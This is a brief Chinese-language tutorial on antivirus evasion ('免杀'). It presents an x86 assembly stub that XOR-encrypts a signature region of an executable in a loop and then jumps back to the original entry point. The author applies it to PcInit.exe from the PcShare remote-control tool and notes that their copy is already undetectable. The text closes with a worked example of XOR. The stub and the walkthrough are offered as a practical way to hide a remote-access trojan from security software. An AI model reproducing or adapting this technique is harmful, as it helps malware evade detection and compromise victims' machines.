异或算法加密特征码(高级免杀)
pushad ///把所有寄存器压入堆栈
mov ebx,xxxxxxxx ///特征码的内存地址传送到ebx寄存器中
mov ecx, 2 ///循环次数
mov eax,dword ptr [ebx] ///把ebx所存放的内存地方传送给eax
xor eax,11111111 ///进行加密 这里我要讲一下XOR算法
mov dword ptr [ebx],eax ///把加密后的内容传送给ebx
add ebx,4 ///ebx的内存地址增加4个字节
loopd short xxxxxxxx ///跳转到 mov eax,dword ptr [ebx] 这个就是循环,刚才上面有个循环次数,2就表示这里循环2次
popad ///把所有寄存器取出堆栈
jmp 原入口点 ///跳转到原入口点
大家仔细看一下代码,好了下面我们实际操作给大家看
我们就拿远控pcshare的PcInit.exe文件做测试吧,因为我的pcshare经前已经做了免杀所以我就随便找段代码进行加密
XOR算法, 相同为0,相异为1
举个例子:
xor 11000,11111 进行加密
加密后的结果如下:
00111
很好理解:相同为0,相异为1
那么我们把结果在进行一下加密:xor 00111,11111
结果如下:
11000
又回到了原来的结果